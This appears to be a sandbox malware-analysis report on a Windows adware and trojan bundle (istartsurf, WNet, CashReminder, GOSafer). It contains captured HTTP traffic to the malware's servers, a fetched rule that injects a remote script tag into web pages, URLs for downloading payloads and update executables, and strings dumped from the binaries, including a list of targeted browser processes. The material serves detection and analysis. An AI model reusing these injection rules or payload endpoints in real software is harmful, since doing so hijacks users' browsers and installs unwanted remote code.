Set-Cookie: __cfduid=d627dcfacd8ecab9edfc9af1368c6b67f1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.com; HttpOnly
X-Powered-By: Servlet/3.0; JBossAS-6
ETag: 91499122d126a896a1d8c34863d5e7acd6de4b53
Expires: Fri, 01 May 2015 04:15:35 GMT
Last-Modified: Thu, 30 Apr 2015 16:15:35 GMT
Cache-Control: max-age=180, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 1df6edc0de2e046d-FRA
GET /v4/sof-installer/535559167_198339_B48A115F?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.dlzip1.istartsurf.finish,5 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
GET /pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar HTTP/1.1
Host: download.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=900000-1199999
Connection: keep-alive
HTTP/1.1 206 Partial Content
Last-Modified: Wed, 26 Nov 2014 16:59:55 GMT
ETag: "4b1e700-2dc5623-508c5f506dac8"
Server: Apache
X-Backend-Server: ftp3.dmz.scl3.mozilla.com
Content-Type: application/octet-stream
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
X-Cache-Info: cached
Cache-Control: max-age=255584
Expires: Sun, 03 May 2015 22:07:04 GMT
Date: Thu, 30 Apr 2015 23:07:20 GMT
Content-Range: bytes 900000-1199999/47994403
Content-Length: 300000
Connection: keep-alive
GET /services/rules.txt?dummy=100 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:37 GMT
Content-Type: text/plain
Content-Length: 111
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT
ETag: "5ac277-6f-514f84cc55900"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:37 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>
ncupons|nncupons
GET /?product=firefox-34.0.5-complete&os=win&lang=en-US HTTP/1.1
Host: download.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=900000-1199999
Cookie: optimizelySegments={"245617832":"none","245875585":"direct","245677587":"ff","246048108":"false","869421433":"true"}; optimizelyEndUserId=oeu1401956287616r0.2603029596469415; optimizelyBuckets={}; __utma=150903082.1617578787.1401956289.1401956289.1401956289.1
Connection: keep-alive
HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: bouncer2.webapp.scl3.mozilla.com
Cache-Control: max-age=60
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:15 GMT
Location: hXXp://download.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar
Keep-Alive: timeout=3, max=499
Content-Length: 0
Connection: Keep-Alive
X-Cache-Info: cached
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEGO+CyDUoFQBjrKVo87pCRc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=563288, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 11:40:21 GMT
Expires: Thu, 7 May 2015 11:40:21 GMT
Date: Thu, 30 Apr 2015 23:12:13 GMT
Connection: keep-alive
GET /install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: log.very911.com
HTTP/1.1 404 Not Found
Server: Tengine/1.2.2
Date: Thu, 30 Apr 2015 23:07:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 668
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<h1>404 Not Found</h1>
<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>
Please report this message and include the following information to us.<br/>
Thank you very much!</p>
<table>
<tr><td>URL:</td><td>hXXp://log.very911.com:8080/install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F</td></tr>
<tr><td>Server:</td><td>us-pub00.v9.com</td></tr>
<tr><td>Date:</td><td>2015/04/30 18:07:19</td></tr>
</table>
<hr/>Powered by Tengine/1.2.2
</body>
</html>
GET /services/rules.txt?dummy=779 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:21 GMT
Content-Type: text/plain
Content-Length: 111
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT
ETag: "5ac277-6f-514f84cc55900"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:21 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>
ncupons|nncupons
GET /services/update.php?v=1.0.0&key=XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488&dummy=268 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=479015, public, no-transform, must-revalidate
Last-Modified: Wed, 29 Apr 2015 12:15:02 GMT
Expires: Wed, 6 May 2015 12:15:02 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
GET /3517/1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
GET /files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 May 2015 01:05:22 GMT
Content-Type: application/zip
Content-Length: 2211012
Last-Modified: Tue, 28 Apr 2015 10:21:26 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhJz1lhSyxS2RYZQVJ48M2bQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/ocsp-response
Content-Length: 1493
Connection: keep-alive
Set-Cookie: __cfduid=d9475cef6091554b34cfafc407203a1381430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.com; HttpOnly
X-Powered-By: Servlet/3.0; JBossAS-6
ETag: 8fc8d7ab1aa7313fa97fcb4c95a3d6ccbfe23096
Expires: Thu, 30 Apr 2015 23:19:16 GMT
Last-Modified: Thu, 30 Apr 2015 11:19:16 GMT
Cache-Control: max-age=180, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 1df6edbd501301b1-FRA
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ShowWebInPopUp
pData\Local\Temp\nscD154.tmp\nsWeb.dll
ai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe
t.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
GetWindowsDirectoryW
RegEnumKeyExW
RegEnumKeyExA
RegCreateKeyExW
RegOpenKeyExW
RegDeleteKeyW
registry.dll
_CopyKey
_CreateKey
_DeleteKey
_DeleteKeyEmpty
_KeyExists
_MoveKey
_RestoreKey
_SaveKey
.reloc
System.dll
callback%d
@.reloc
nscD154.tmp
pData\Local\Temp\nscD154.tmp
00663296
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsmD142.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
-2046754816
-2147410511
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="highestAvailable" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
%s /s "%s"
regedit.exe
REG_KEY
%s%s%s
=hex(%x):
=dword:x
="%s"
[%s\%s]
[-%s\%s]
Windows Registry Editor Version 5.00
5.9.1.7
%original file name%.exe_1512_rwx_003F4000_00001000:
callback%d
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe_1884:
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ShowWebInPopUp
pData\Local\Temp\nssD4BE.tmp\nsWeb.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll
%Program Files%
\nsWeb.dll
hXXp://goo.gl/Bw14Po
$$\wininit.ini
@.reloc
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp
nssD4BE.tmp
:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nscD4AC.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
8.9.3.9
WNet.exe_3080:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")JumpID("","%s")TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start WNet
cmd.exe /c net stop WNet
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
CashReminder.exe_1108:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")JumpID("","%s")TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
content-security-policy-report-only
127.0.0.1
255.0.0.0
ServiceExecute
\P_StoreList.txt
\P_CheckUpdate.txt
\cr_update.exe
hXXp://VVV.related.deals/services/rules?dummy=
hXXp://VVV.related.deals/services/stores?dummy=
hXXp://VVV.related.deals/services/update/
\P_RuleList.txt
[N] ProductKey :
cmd.exe /c net start CashReminder
cmd.exe /c net stop CashReminder
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
GOSafer.exe_3284:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")JumpID("","%s")TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\G_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\gs_update.exe
hXXp://VVV.gosaferllc.com/services/rules.txt?dummy=
hXXp://VVV.gosaferllc.com/services/update.php?v=
&key=
\G_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start GOSafer
cmd.exe /c net stop GOSafer
c:\log.log
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
ActSys.exe_3756:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeyword<
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")JumpID("","%s")TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewx4D
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute<XE
iexplore.exe
firefox.exe
chrome.exe
safari.exe
opera.exe
netscape.exe
torch.exe
seamonkey.exe
k-meleon.exe
konqueror.exe
maxthon.exe
flock.exe
lunascape.exe
amaya.exe
midori.exe
kidzui.exe
rockmelt.exe
sbrowser.exe
slimbrowser.exe
kidrocket.exe
epic.exe
